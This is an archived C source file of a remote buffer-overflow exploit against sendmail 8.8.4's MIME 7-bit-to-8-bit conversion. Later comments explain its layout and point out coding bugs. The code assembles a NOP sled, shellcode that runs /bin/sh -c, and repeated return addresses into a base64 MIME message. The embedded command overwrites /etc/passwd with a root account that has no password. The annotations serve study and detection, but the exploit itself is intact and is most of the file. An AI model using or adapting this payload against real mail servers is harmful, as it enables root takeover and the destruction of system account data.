/*
 * sendmail 8.8.4, FreeBSD, MIME 7to8 conversion, remote.
 * Author's notes: checked only at home on a custom-installed 8.8.4; no
 * FreeBSD with a preinstalled 8.8.4 was available. cmd[] below is the shell
 * command carried in the payload; the program prints a base64-encoded MIME
 * message on stdout, which the author intends to be handed to sendmail.
 *
 * Archived listing (www.hack.co.za, 2000), kept as written. The vulnerable
 * component is the 7-bit-to-8-bit MIME conversion in the sendmail version
 * named above; the remedy is running a sendmail release that no longer has
 * that defect. The observable artefact on the wire is an inbound message
 * with "Content-Transfer-Encoding: base64" whose body decodes to a long run
 * of a single filler byte (nop[]) followed by machine code (asmcode[]) and
 * a repeated 4-byte address; run() and main() below fix the exact layout.
 */

#include <stdlib.h>
#include <fcntl.h>

#define BUFSIZE 6100   /* default length of the filler region; argv[1] overrides it */
#define OFFS -5000     /* default offset added to get_sp(); argv[2] overrides it */
#define ALIGN 0        /* not referenced anywhere in this listing */
#define ADDRS 15       /* default repeat count of the address tail (argv[3]); the macro itself also appears in main()'s malloc() size */
/*
 * Returns a fixed stack-address guess. The inline asm that would read %esp
 * is commented out, so the offset from argv[2] is applied to this constant
 * in main(), not to the running process's stack pointer. The literal does
 * not fit in int, so its conversion to the return type is
 * implementation-defined.
 */
int get_sp(void)
{
/* __asm__(" movl %esp,%eax"); */
return 0xefbf95e4;
}

/* up to 220 bytes */
/*
 * Shell command string. main() appends it, plus a "." terminator, to
 * asmcode[] in code[] and patches the combined length into code[41]. The
 * payload's own tail spells "/bin/sh.-c.", which suggests this string ends
 * up as the argument of a "-c" shell invocation — not verified here by
 * disassembly.
 */
char cmd[]="echo 'h::0:0:/tmp:/bin/bash > /etc/passwd'";

/*
 * Opaque machine-code payload; not disassembled in this review. The last
 * two string fragments are the ASCII bytes "/bin/sh.-c." (2f 62 69 6e 2f 73
 * 68 2e 2d 63 2e); the '.' bytes are presumably placeholders rewritten at
 * run time — TODO confirm.
 */
char asmcode[]="\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89"
"\x36\x89\x76\x04\x89\x76\x08\x83\x06\x10\x83\x46"
"\x04\x18\x83\x46\x08\x1b\x89\x46\x0c\x88\x46\x17"
"\x88\x46\x1a\x88\x46\x1d\x50\x56\xff\x36\xb0\x3b"
"\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
"\x02\x02\x02\x02\x02\x02\x2f\x62\x69\x6e\x2f\x73"
"\x68\x2e\x2d\x63\x2e";

/* Single filler byte (0x90). main() cycles through it with i % noplen, so
 * with one byte the whole filler region is that byte repeated. */
char nop[]="\x90";

/* Standard base64 alphabet, indexed by 6-bit groups in run(). */
char Base64Table[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/*
 * Write buf to stdout as a MIME message: three header lines, then the
 * base64 encoding of the NUL-terminated contents of buf.
 *
 * Every three input bytes become four alphabet characters. A newline is
 * printed before the group whose input offset is a multiple of 54, i.e.
 * every 72 output characters; the one printed at i == 0 is the blank line
 * that separates the headers from the body. A remainder of one or two
 * bytes is padded with "==" or "=" respectively.
 *
 * buf is declared unsigned char * but its length is taken with strlen(),
 * so encoding stops at the first NUL — the terminator main() writes.
 */
void run(unsigned char *buf)
{
unsigned int i, j, k;

printf("MIME-Version: 1.0\n");
printf("Content-Type: text/plain\n");
printf("Content-Transfer-Encoding: base64\n");

/* k = length rounded down to a multiple of 3; the remainder is handled below */
k=strlen(buf) / 3 * 3;
for (i=0; i < k; i+=3)
{
/* pack three bytes into one 24-bit value, most significant first */
j=(buf[i] << 16) + (buf[i+1] << 8) + buf[i+2];
if (i % 54 == 0)
printf("\n");
/* four 6-bit slices, top to bottom */
printf("%c", Base64Table[(j & 0xfc0000) >> 18]);
printf("%c", Base64Table[(j & 0x03f000) >> 12]);
printf("%c", Base64Table[(j & 0x000fc0) >> 6]);
printf("%c", Base64Table[j & 0x00003f]);
}
/* trailing 1 or 2 bytes, with base64 '=' padding */
switch (strlen(buf) - k)
{
case 1:
printf("%c%c==", Base64Table[(buf[k] & 0xfc) >> 2],
Base64Table[(buf[k] & 0x3) << 4]);
break;
case 2:
printf("%c%c%c=", Base64Table[(buf[k] & 0xfc) >> 2],
Base64Table[((buf[k] & 0x3) << 4)+((buf[k+1] & 0xf0) >> 4)],
Base64Table[(buf[k+1] & 0xf) << 2]);
break;
default:
}
printf("\n");
}

/*
 * Combined payload built by main(): asmcode followed by cmd and a ".".
 * sizeof counts both strings' NUL terminators, so there is exactly one
 * spare byte for the "." plus the final NUL.
 */
char code[sizeof(asmcode) + sizeof(cmd)];

/*
 * Build the message body and hand it to run().
 *
 * Optional arguments, all converted with atoi() and otherwise unchecked:
 *   argv[1]  length of the filler region (default BUFSIZE)
 *   argv[2]  offset added to get_sp() (default OFFS)
 *   argv[3]  number of 4-byte address copies appended (default ADDRS)
 *
 * Layout of buf as assembled below: bufsize bytes of the nop[] pattern,
 * with code[] overwriting the last strlen(code) of them, then addrs*4 bytes
 * that repeat the 4-byte value in addr[0..3], then a NUL so that run() can
 * measure it with strlen().
 */
main(int argc, char *argv[])
{
char *buf, *ptr, addr[8];
int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS;
int i, noplen=strlen(nop);

if (argc >1) bufsize=atoi(argv[1]);
if (argc >2) offs=atoi(argv[2]);
if (argc >3) addrs=atoi(argv[3]);

/* code = asmcode + cmd + "." ; then patch a length byte inside the payload
 * with 0x1a plus the command length including the "." */
strcpy(code, asmcode);
strncat(code, cmd);
strncat(code, ".");
code[41]=0x1a+strlen(cmd)+1;

/* int vs size_t comparison: a negative bufsize converts to a huge unsigned
 * value and therefore passes this check; the message reports
 * strlen(asmcode), not strlen(code) */
if (bufsize<strlen(code))
{
printf("bufsize too small, code is %d bytes long\n", strlen(asmcode));
exit(1);
}
/* '+' binds tighter than '<<', so this size is
 * (bufsize+ADDRS) << (2+noplen+1), far more than the bytes written below */
if ((buf=malloc(bufsize+ADDRS<<2+noplen+1))==NULL)
{
printf("Can't malloc\n");
exit(1);
}
/* store the guessed address in addr[0..3] via an int aliasing the char
 * array; addr[4..7] are never written and never read (the tail loop uses
 * i % sizeof(int)) */
*(int *)addr=get_sp()+offs;
printf("address - %p\n", *(int *)addr);
ptr=buf;
/* filler region */
for (i=0; i<bufsize; i++)
*ptr++=nop[i % noplen];
/* payload overwrites the end of the filler region */
memcpy(ptr-strlen(code), code, strlen(code));
/* addrs*4 bytes cycling through the 4 address bytes */
for (i=0; i<addrs<<2; i++)
*ptr++=addr[i % sizeof(int)];
*ptr=0;
printf("total buf len - %d\n", strlen(buf));

run(buf);
}
/* www.hack.co.za [2000]*/